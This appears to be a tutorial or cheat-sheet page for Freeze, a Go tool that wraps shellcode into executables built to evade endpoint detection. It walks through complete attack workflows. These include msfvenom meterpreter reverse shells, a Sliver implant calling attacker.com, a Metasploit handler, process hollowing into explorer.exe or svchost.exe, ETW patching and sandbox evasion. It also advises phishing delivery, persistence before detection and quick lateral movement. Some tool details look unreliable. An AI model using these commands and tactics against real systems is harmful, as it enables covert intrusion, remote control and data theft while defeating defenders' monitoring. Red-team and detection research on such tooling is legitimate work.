Freeze

Freeze is a payload generator by Optiv that creates EDR-evasive executables from shellcode using advanced techniques like suspended process creation, direct syscalls, and memory encryption to evade endpoint detection and response systems. Built in Go, Freeze combines multiple evasion mechanisms to bypass modern security controls while maintaining reliable shellcode execution.

Installation

Install Freeze using Go’s built-in tools or compile from source.

# Install via go install
go install github.com/optiv/Freeze@latest

# Clone and build from source
git clone https://github.com/optiv/Freeze.git
cd Freeze
go build -o Freeze main.go

Prerequisites:

Go 1.18+ installed
Windows development environment (generates Windows executables)
Shellcode payload (raw binary format)

Quick Start

Generate an EDR-evasive executable from shellcode in seconds.

# Basic usage with shellcode file and output
Freeze -I shellcode.bin -O output.exe

# With encryption enabled
Freeze -I shellcode.bin -O output.exe -encrypt

# Using suspended process injection
Freeze -I shellcode.bin -O output.exe -process explorer.exe

Input Options

Prepare and specify shellcode for Freeze to wrap and execute.

Option	Example	Purpose
`-I`	`-I shellcode.bin`	Input shellcode file (raw binary format)
`-I`	`-I shellcode.txt`	Input shellcode as hex-encoded text

Generating Shellcode:

Msfvenom:

# Generate meterpreter reverse shell
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.10 LPORT=8080 -f raw > shellcode.bin

# Generate cmd.exe execution
msfvenom -p windows/exec CMD='cmd.exe /c whoami' -f raw > shellcode.bin

Cobalt Strike:

# Export shellcode from Cobalt Strike beacon
# Payload tab → Generate Payload
# Format → raw
# Export to file

Sliver:

# Generate shellcode in Sliver
sliver> generate --http=http://192.168.1.10:8080 --format=shellcode --save=sliver.bin

Execution Methods

Choose how Freeze injects and executes the shellcode.

Method	Flag	Behavior
Process Creation	`-process`	Creates suspended process, hollows it, executes shellcode
Process Injection	`-inject`	Injects into running process (requires target)
Self-Injection	`-self`	Direct injection into Freeze process (in-memory)
Encryption	`-encrypt`	AES encrypts shellcode, decrypts at runtime

Process Creation (Default):

# Create suspended explorer.exe and inject
Freeze -I shellcode.bin -O output.exe -process explorer.exe

# Create suspended svchost.exe
Freeze -I shellcode.bin -O output.exe -process svchost.exe

# Create suspended RuntimeBroker.exe
Freeze -I shellcode.bin -O output.exe -process RuntimeBroker.exe

Process Injection:

# Inject into running process by PID
Freeze -I shellcode.bin -O output.exe -inject=1234

# Enumerate processes and inject into specific target
tasklist
Freeze -I shellcode.bin -O output.exe -inject=explorer.exe

Self-Injection:

# Direct injection into Freeze executable's own process
Freeze -I shellcode.bin -O output.exe -self

Process Options

Target process selection for suspended process creation and hollowing.

Common Target Processes:

Process	Use Case	Stealth Rating
`explorer.exe`	Always running, user context	High
`svchost.exe`	System process, multiple instances	High
`RuntimeBroker.exe`	Low-profile system process	Very High
`notepad.exe`	Simple, predictable behavior	Medium
`mspaint.exe`	Common user process	Medium
`werfault.exe`	Error reporting, less monitored	High

Process Selection:

# Use explorer.exe (recommended for user context)
Freeze -I shellcode.bin -O output.exe -process explorer.exe

# Use svchost.exe (system context, multiple instances)
Freeze -I shellcode.bin -O output.exe -process svchost.exe

# Use RuntimeBroker.exe (minimal EDR visibility)
Freeze -I shellcode.bin -O output.exe -process RuntimeBroker.exe

# Use custom process
Freeze -I shellcode.bin -O output.exe -process myapp.exe

Encryption

Encrypt shellcode to evade memory scanners and signature-based detection.

# Enable AES encryption (default key derivation)
Freeze -I shellcode.bin -O output.exe -encrypt

# Encryption + process creation
Freeze -I shellcode.bin -O output.exe -encrypt -process explorer.exe

# Encryption + sandbox evasion
Freeze -I shellcode.bin -O output.exe -encrypt -sandbox

How Encryption Works:

Shellcode encrypted with AES-256 in CBC mode
Key derived from environment-specific data
Decryption occurs at runtime before execution
Memory scanner blind spot: encrypted shellcode invisible to static scanning
Minimal performance overhead

Evasion Techniques

Freeze implements multiple EDR evasion mechanisms by default.

Suspended Process Creation:

# Creates child process in suspended state
# Avoids early EDR thread entry hooks
# Shellcode injected before resumption
Freeze -I shellcode.bin -O output.exe -process explorer.exe

Direct Syscalls:

Avoids Windows API hooks commonly used by EDR
Uses native syscalls for process creation, memory allocation
Bypasses user-mode API interception

ETW Patching:

Disables ETW (Event Tracing for Windows) to reduce logging
Prevents suspicious activity events from being recorded
Reduces forensic evidence post-execution

No RWX Memory:

# Freeze avoids RWX (Read-Write-Execute) memory pages
# Uses RW then RX pattern to evade EDR memory scanning
# Shellcode injected into RW page, then changed to RX for execution

Anti-Tamper:

# Runtime validation of shellcode integrity
# Detects in-memory tampering by EDR inline hooks
Freeze -I shellcode.bin -O output.exe -encrypt

Sandbox Evasion

Detect and avoid running in analysis environments.

# Enable sandbox detection checks
Freeze -I shellcode.bin -O output.exe -sandbox

# Sandbox + encryption + process creation (maximum evasion)
Freeze -I shellcode.bin -O output.exe -sandbox -encrypt -process explorer.exe

Checks Performed:

Virtual machine detection (Hyper-V, VirtualBox, VMware)
Debugger detection (parent process check, breakpoint detection)
Analysis tool detection (WinDbg, x32dbg, IDA)
Timing checks (execution time anomalies)
Process counting (abnormally low process count = sandbox)
DLL analysis (absence of common DLLs = sandbox)

Output Options

Customize the final executable output.

Option	Example	Purpose
`-O`	`-O payload.exe`	Output executable filename
`-console`	`-console`	Generate console application (vs Windows app)
`-sign`	`-sign=cert.pfx`	Code sign the executable (optional)

# Standard output executable
Freeze -I shellcode.bin -O output.exe

# Console application (shows console window)
Freeze -I shellcode.bin -O output.exe -console

# Specific output path
Freeze -I shellcode.bin -O C:\payloads\beacon.exe

Complete Workflow Examples

Cobalt Strike Integration

# 1. Generate shellcode from Cobalt Strike
# Payload tab → Generate Payload → Format: raw → Save as shellcode.bin

# 2. Create EDR-evasive payload
Freeze -I shellcode.bin -O beacon-evasive.exe -encrypt -process explorer.exe -sandbox

# 3. Deliver executable
# Host on web server, deliver via phishing, file share, etc.

# 4. Execute on target
# Double-click beacon-evasive.exe
# Callback to Cobalt Strike team server

Sliver C2 Integration

# 1. Generate Sliver shellcode
sliver> generate --http=http://attacker.com:8080 --format=shellcode --save=sliver.bin

# 2. Wrap with Freeze for evasion
Freeze -I sliver.bin -O implant.exe -encrypt -process svchost.exe

# 3. Deploy payload
# Sliver automatically handles callbacks after execution

# 4. Implant execution
# Implant → sliver session established

Metasploit Integration

# 1. Generate meterpreter shellcode
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.10 LPORT=8080 -f raw > meterpreter.bin

# 2. Create Freeze payload
Freeze -I meterpreter.bin -O meterpreter-evasive.exe -encrypt -process RuntimeBroker.exe -sandbox

# 3. Set up handler
msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set LHOST 192.168.1.10; set LPORT 8080; exploit"

# 4. Execute on target
# meterpreter-evasive.exe calls back to handler

Comparison with ScareCrow

Feature	Freeze	ScareCrow
Language	Go	C#
Encryption	AES-256	Variable
Process Methods	Multiple	Fewer options
ETW Patching	Yes	Yes
Syscalls	Direct	Native APIs
Sandbox Evasion	Built-in	Add-on
Code Signing	Limited	Better support
Obfuscation	Minimal	More aggressive
Output Size	Smaller	Larger

When to Use Freeze:

Maximum stealth with minimal payload size
Direct syscall evasion preferred
Quick deployment needed
Multiple process injection methods required
EDR with strong syscall monitoring expected

When to Use ScareCrow:

Code signing/digital signature required
Complex obfuscation needed
Defensive tuning more important
C# shellcode preferred
Flexible staging options

Troubleshooting

Shellcode Execution Fails:

# Verify shellcode format (must be raw binary)
xxd -l 32 shellcode.bin

# Test with simple cmd execution
msfvenom -p windows/exec CMD='calc.exe' -f raw > calc.bin
Freeze -I calc.bin -O test.exe

# Check for architecture mismatch (32-bit vs 64-bit)
# Freeze assumes 64-bit shellcode by default

EDR Still Detects Payload:

# Increase evasion layers
Freeze -I shellcode.bin -O output.exe -encrypt -sandbox -process explorer.exe

# Try different target process
Freeze -I shellcode.bin -O output.exe -process RuntimeBroker.exe

# Add code signing (if available)
# Manual signing with custom cert

Execution Hangs or Crashes:

# Target process may be incompatible
# Try different process for injection

# Shellcode may expect specific context
# Test shellcode directly with msfvenom first
msfvenom -p windows/meterpreter/reverse_http LHOST=x.x.x.x LPORT=80 -e x86/shikata_ga_nai -i 3 -f raw > shellcode.bin

# Verify no corruption during file transfer
md5sum shellcode.bin

Sandbox Detection False Positives:

# Disable sandbox evasion if running in lab
Freeze -I shellcode.bin -O output.exe -encrypt -process explorer.exe
# (no -sandbox flag)

# May trigger in strict isolated lab environments

Best Practices

Operational Security:

Generate Freeze payloads on isolated development system
Never test payloads on personal systems
Use temporary file paths, delete artifacts
Verify shellcode quality before wrapping
Test in lab environment before deployment

Payload Delivery:

Combine with social engineering (phishing, etc.)
Host behind legitimate-looking domains
Use multi-stage delivery if possible
Consider email attachment, file sharing services
Document decoy content for pretexting

Evasion Strategy:

Layer multiple evasion techniques
Rotate target processes across deployments
Re-encrypt shellcode regularly
Update payload generation techniques
Monitor for EDR bypass effectiveness

Operational Tracking:

Tag payloads with engagement ID
Log which evasion techniques per target
Track successful vs. blocked executions
Document bypass techniques that fail
Adjust strategy based on real-world results

Post-Exploitation:

Assume initial execution will be detected eventually
Establish persistence before EDR reacts
Move laterally quickly
Clean up shellcode memory after execution
Maintain cover story for suspicious execution

Tool	Purpose	Key Difference
ScareCrow	EDR evasive payload generator	C# based, more obfuscation
Donut	In-memory .NET execution	.NET shellcode generation
PEzor	Shellcode converter	Converts PE to shellcode
NimCrypt2	AES encryption wrapper	Nim language, lightweight
shhhloader	Process hollowing tool	Standalone hollowing utility
Chimera	Obfuscation framework	YARA rule evasion focused
Ekko	Sleep obfuscation	Evades sleep detection
Threadstacks	Stack spoofing	Advanced call stack evasion

Integration Ecosystem:

Works seamlessly with Cobalt Strike, Sliver, Metasploit
Generates raw shellcode for any C2 framework
Compatible with msfvenom, custom generators
Pairs well with post-exploitation frameworks
Enhances any EDR evasion strategy